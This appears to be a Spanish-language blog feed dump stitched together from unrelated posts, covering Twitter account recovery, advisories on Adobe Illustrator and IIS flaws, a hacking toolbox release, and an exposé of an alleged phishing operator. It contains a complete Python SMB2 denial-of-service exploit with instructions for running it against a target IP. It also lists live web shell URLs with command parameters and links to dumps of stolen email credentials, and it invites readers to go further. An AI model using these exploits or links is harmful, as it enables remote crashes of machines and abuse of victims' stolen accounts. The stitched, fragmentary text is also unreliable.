EKOparty 2011

Twitter es una de las red sociales con mas crecimiento en los últimos años, ya que de forma simple permite a cualquier persona desde virtualmente “cualquier parte” publicar pequeñas piezas de texto (no mas de 140 caracteres) que puede ser visualizada por otras personas instantáneamente, lo que la ha convertido en una herramienta muy útil para personas, medios de comunicación, famosos, y una que otra revolución etc…

Para algunas personas perder su cuenta de Twitter es mucho peor que perder un ser querido y si no pueden a acceder a ella pierden la cabeza, por eso (antes que alguien comenta una locura) escribimos estas lineas, para que cualquier persona pueda recuperar su cuenta de Twitter fácilmente, utilizando los medios que esta red social nos proporciona.

Lo primero que debemos hacer si es que no lo has hecho es ingresar a este formulario (el aspecto de estos formularios puede cambiar con el tiempo, pero la esencia NO, por lo que este articulo debe servirte aunque el sitio parezca diferente), donde nos piden nuestra cuenta de correo electrónico y un código CAPTCHA.

Si todo sale bien, a tu correo llegara un enlace por el cual puedes cambiar tu contraseña fácilmente, pero si estas leyendo este articulo, lo mas seguro es que tu cuenta de correo electrónico también fue comprometida (ver recuperar cuentas de hotmail) y no puedes recuperar tu contraseña por este medio, en estos casos Twitter pone a nuestra disposición el siguiente procedimiento para que de todas formas podamos recuperar nuestra cuenta.

Entramos a esta dirección dentro del centro de ayuda de Twitter y buscamos el enlace “solicitud de ayuda”…

Una vez en el menú AYUDA de Twitter elegimos la opción “Todo lo demás”…

Encontraremos un formulario de contacto, donde debemos seleccionar la opción “Phishing o cuenta hackeada” y llenar TODA la información que nos solicitan…

Después de estos pasos, solo debemos esperar que se comuniquen con nosotros para restablecer nuestros acceso a la cuenta de Twitter y LISTO…

Recuerda que por lo menos en Colombia, el acceso NO AUTORIZADO a tu información privada (en esta categoría están incluidas las redes sociales y cuentas de correo) es penalizado en el ARTICULO 269F de la ley 1273 del 2009, por lo que es recomendable denunciar el caso a las autoridades pertinentes para que este delito no quede impune.

Algunos consejos adicionales POST recuperación:

• NO ingresar a tus cuentas de correos o redes sociales, desde conexiones publicas (Centros Comerciales, Universidades, Congresos, Terminales, Aeropuertos, Restaurantes, Etc…) y desconfía de cualquier conexión que este abierta (sin seguridad).
• Analizar tu computador y todos los computadores desde donde accedes a tu cuenta, con un software Anti Keyloggers y un buen Anti Virus ya que el uso de estas herramientas es un método comúnmente utilizado para robar tus datos de acceso.
• No abras archivos adjuntos, ni accedas a enlaces de personas desconocidas, si la persona que te lo envía es conocida, preguntale primero qué es antes de abrirlo, muchas veces el malware envía enlaces y adjuntos maliciosos desde las cuentas de tus conocidos sin que ellos se enteren.
• Utiliza una contraseña segura, que tenga mínimo 8 caracteres combinados entre números, letras y símbolos (#@!*&^%. etc..) que sea fácil de recordar, pero difícil de adivinar.
• Nunca publiques tu clave, y si  es de vida o muerte hacerlo, cambia tu contraseña y tu pregunta secreta, tan pronto puedas hacerlo.

Ademas es recomendable que te leas los Consejos para hacer correcto uso de las redes sociales y la guía para configurar la privacidad en las redes sociales , como también los pasos para recuperar cuentas de Hotmail, Messenger y Facebook.

Fuente: La WeB de DragoN

• Adobe Illustrator CS4 (versión 14.0.0)
• Adobe Illustrator CS3 (versión 13.0.3 y anteriores)

Nota: las plataformas afectadas son Windows y Macintosh. Detalle Múltiples errores en el tratamiento de datos de gran tamaño en archivos Encapsulated Postscript (.eps) podrían ser aprovechados para causar desbordamiento de búfer y ejecutar código arbitrario a través de un archivo especialmente diseñado. Impacto El impacto de estas vulnerabilidades es CRÍTICO.

Fuente: http://www.adobe.com/support/security/bulletins/apsb10-01.html

El exploit para detonar esta vulnerabilidad (php que genera el archivo .eps ) :   exploit :D

• Microsoft Internet Information Services (IIS) 6 corriendo en Windows Server 2003 R2 SP2 completamente actualizado.

Nota: otras versiones también podrían estar afectadas. Detalle El error se provoca al no filtrar correctamente el carácter “;” en el nombre de un archivo. De este modo un atacante remoto podría subir al servidor un archivo ASP y ejecutar su contenido suplantando, por ejemplo, una imagen. Aunque IIS incorpora una medida de seguridad que evita ejecutar código cuando un archivo tiene múltiple extensión, la falla permite que si se consigue subir un archivo llamado “foto.asp;.jpg” al servidor, la aplicación lo tome como una imagen, pero en realidad se ejecute su código ASP al invocarlo.

El hecho de que un atacante pueda ejecutar código ASP arbitrario en un servidor, abre un amplio abanico de posibilidades. Dependiendo de la configuración, quedará comprometida no solo la página, sino todo el servidor que lo aloja.

Para poder aprovechar esta vulnerabilidad es necesario que el servidor permita subir archivos. El atacante sólo debe realizar un simple cambio en la extensión del nombre del archivo. Dado que muchas aplicaciones web permiten subir archivos fotográficos (por ejemplo a modo de “avatar”) el impacto en estos servidores es importante. Impacto El impacto de estas vulnerabilidades es ALTO.

Alerta original:
http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf

Hispasec:
http://www.hispasec.com/unaaldia/4080/

Microsoft:
http://blogs.technet.com/msrc/archive/2009/12/27/new-reports-of-a-vulnerability-in-iis.aspx ]]> http://www.enmanosdenadie.com.ar/2009/12/nueva-vulnerabilidad-microsoft-internet-information-services-iis/feed/ 2 http://www.enmanosdenadie.com.ar/2009/12/corazones-0-1-2/ http://www.enmanosdenadie.com.ar/2009/12/corazones-0-1-2/#comments Mon, 21 Dec 2009 01:11:50 +0000 Diego http://www.enmanosdenadie.com.ar/?p=954 Bueno, luego de un finde a puro codear, tengo una nueva release de Corazones. Les cuento las novedades.

https://sourceforge.net/projects/corazones/

VERSION 0.1.2

Novedades en esta versión:

- Sistema de alerta de nuevas versiones. Al estar disponible una nueva versión, muestra un cartel ofreciendo el link de descarga. ( esto funciona mediante un ping a un txt que guarda el número de la última versión disponible.
- Agregada una nueva herramienta: Reverse DNS. Al ingresar un host o IP nos indica los sitios web alojados en el mismo servidor.
- Agregada otra nueva herramienta: Diccionarios / Brute force . Esta herramienta esta aún incompleta, pero ya ofrece 13 diccionarios selectos especialmente (no son cualquier basura) que se pueden utilizar en cualquier tipo de aplicación que necesite de ellos, por ejemplo “aircrack” o “hydra”. En próximas versiones se incluirá un script para testear fuerza bruta directamente desde Corazones.
- Nuevo sistema de “mostrar / ocultar” herramientas con JS, con un click aparecen y al darle de nuevo se cierran.

Gracias a la gente interesada que aporto scripts nuevos, ideas, etc. y a todos por el apoyo!

saludxs

Feature list:

# Arreglé un par de detalles menores.
# Incorporé una nueva herramienta:   Diccionarios / Brute Force
Es un gestor que permite almacenar los diccionarios y revisarlos, y en un futuro permitirá eliminar palabras repetidas, mergear diccionarios y lógicamente utilizarlos para hacer alguna prueba de fuerza bruta.

Desde hace algún tiempo al leer los post de los usuarios de Diosdelared.com veo que existen muchos scripts para tareas variadas referidas a la web, pero cada uno a su modo, en distintos lenguajes, con distinta estética, etc.  Por lo que se me ocurrió nuclear esos scripts formando una toolbox. Eso es Corazones, un conjunto de herramientas para auditoría en redes y uso general.

La tarea de agrupar estos script no es tan fácil como parece, pero va tomando forma. Además no es solo agruparlos, casi todos los script tuvieron modificaciones para “pulirlos”, mejorando la usabilidad y agregando funcionalidades.

Algunas de las herramientas que ya incluye (se irán agregando más)

MAC spoofing
Este pequeño script nos acelera el uso de macchange para cambiar la dirección MAC de nuestra interfaz de red. Uno de los usos puede ser bypassear filtrado por MAC de un Access Point.

Port Scanner
Bueno, no necesita explicación, pasamos un host (local o remoto) y nos muestra los puertos abiertos.

Admin panel finder
Esta herramienta nos ayuda a encontrar la puerta de entrada al backend de una aplicación o sitio web.

General Inyection Explorer
Esta excelente herramienta permite explotar una inyección de SQL recorriendo completamente la BD en forma visual.

MD5 multi search
Ingresando un md5 nos busca en 16 sitios distintos la palabra a la que corresponde el hash.

Metasploit Launcher
Un lanzador de la interfaz web del framework Metasploit.

Lo más importante:  este proyecto es abierto, estan bienvenidos todos los que quieran participar ya sea con sus propios scripts o como sea.
El proyecto es software libre, tiene licencia GPL. /> Se puede bajar para probarlo desde su sitio oficial en Sourceforge.

Saludxs!
Diego

…………………..

A continuación el post de Lizandro Lezaeta:  (fuente)

Hola a todos, escribo este artículo para evidenciar públicamente la total y absoluta falta de etica del supuesto “Experto en Seguridad” Argentino y desarrollador de Tuquito Linux, Mauro torres.

Junto a Daniel Godoy continuamos una investigación iniciada por un tercero (a quien nombraré si es que me da su autorización), de universomsn.com, un sitio de pishing de correo electrónico. Este sitio utiliza el “Quien te admite” para robar emails, acceder a ellos y robar lista de contactos, además almacena todas las contraseñas y los emails robados en una base de datos.

En la IV Jornadas de Software Libre realizamos, en vivo y en directo, una demostración que relacionaba a Mauro Torres con Universomsn.com, una web de pishing de msn. Además accedimos al servidor de universomsn y dumpeamos la base de datos demostrando a todos los espectadores que el sujeto había robado más de 3500 mails.

Nos guardamos la guinda para publicar por internet, ahora es el turno de msnsinadmision.com subida en el mismisimo servidor de tuquito. Sin duda propiedad de Mauro Torres, al igual que Universomsn, en este caso no ha tenido ni siquiera la dignidad de ocultar el sitio, publicandolo directamente en el SERVIDOR DONADO que recibió para tuquito.org.ar. Encontramos montones de backups subidos que van desde los 81mb comprimidos (500 mb reales) con unos 100mil mails/contraseña hasta un backup (que dejo al final) de más de medio giga.

Pinche aquí para ver el vídeo

No tengo posibilidad de reportar 100mil mails robados, por eso decido hacerlo público antes de que sigan sirviendo a las malas intenciones del ladrón.
Personalmente no voy a denunciar, pero si alguno de los afectados está interesado en hacerlo, no dude en contactar conmigo para recibir toda la información relevante.

Acá dejo un log interesante:

Curiosidades con las que nos topamos: El experto no pone password de root a mysql, el experto hacer correr apache con suid (root), el experto sube shells sin contraseña para administrar sus servidores y ensima las sube con nombres sencillos como “cmd.php” o “shell.php”.

La falta de etica no es nada nuevo hoy en día, pero la hipocresía con la que este personaje se autodenomina “ético” es increible.

Si alguien quiere continuar la investigación (o hacer algo peor) puede facilmente pasar un nmap y localizar algo que alguien olvidó cerrar :P

Enlaces interesantes (subidos en su servidor por Mauro Torres, yo solo lo encontré ahí):

http://www.tuquito.org.ar/hack/shell.php

http://www.tuquito.org.ar/hack/shell.php?cmd=dir&dir=./../../../universomsn

http://www.tuquito.org.ar/hack/shell.php?cmd=dir&dir=./../../../msn2/html

http://msnsinadmision.com/msn2sql.tar.gz
http://www.tuquito.org.ar/hack/msn2DB-120508.sql

Les pido a los que lleguen a tiempo para contrastar la información, lo certifiquen en un comentario. Seguramente todo esto deje de estar online en poco tiempo.

———————————-

La gran duda que se me plantea luego de leer el post es si la distribución Tuquito no esconde scripts sucios o artimanias similares para el robo de información de los usuarios.  Para contestar esta pregunta, habría que leer el código fuente de la distro en detalle y no solo eso, además se debería chequear que los binarios en la ISO de Tuquito coincidan con los binarios generados a partir del código.

Diego

Se detectó una nueva y muy grave vulnerabilidad en el sistema operativo de Micro$oft que afecta las versiones “Vista” y “Seven”. La misma es una falla en SMB2 y permite colapsar remotamente un equipo, haciéndolo mostrar la famosa blue screen of death y obligándolo a reiniciarse, obviamente perdiendo toda la información de la sesión.

El script para explotar dicha vulnerabilidad está escrito en Python y es el siguiente:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header
# PAGE_FAULT_IN_NONPAGED_AREA 

import sys
from socket import socket
from time import sleep

host = sys.argv[1], 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -->  normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Para ejecutarlo, creamos un archivo  script.py  pegamos el script de arriba dentro del mismo. Hay que modificar donde dice “IP_ADDR” por la dirección IP de la máquina objetivo y lo guardamos.
Luego damos permisos de ejecución al script desde una terminal con:

dfa@diego-factory:~$ chmod +x script.py

y lo ejecutamos:

dfa@diego-factory:~$ python script.py [ ip ]

Microsoft no tiene solución aún para este problema, por lo que lo único que pueden hacer los tristes usuarios de Windows para evitar abusos es desactivar SMB2 o en todo caso, cerrar el puerto 445 o mejor aún, instalar en sus computadoras un sistema operativo libre y seguro.

La fuente original del exploit y la noticia en general me llegó gracias a tty0.

Las fotos: